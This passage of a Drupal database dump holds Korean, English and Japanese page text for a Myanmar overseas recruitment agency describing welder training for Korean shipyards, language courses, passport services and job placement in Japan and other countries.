lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">농업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">물</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">돌봄</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp;6. &nbsp;두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사람들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요하는 &nbsp; &nbsp; &nbsp; &nbsp; 경우에&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">컴퓨터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">많은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정들과 연결하고 취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를 하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; 7. 상기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\">&nbsp; </span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">IRIS(International Recruitment Integrity System)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">윤리적</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">채용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노동</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관행 &nbsp; &nbsp; &nbsp; 의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">마련하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공합니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 24, 231, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 231, 'ja', 0, '<p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 231, 'ko', 0, '<ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 한국 조선소에서</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> E-7-3 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접공</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 외국에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일할 때 직장에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어려움을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">겪지</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">않도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직장에 사용하는 기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어 수업들을 교육 시킴</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" 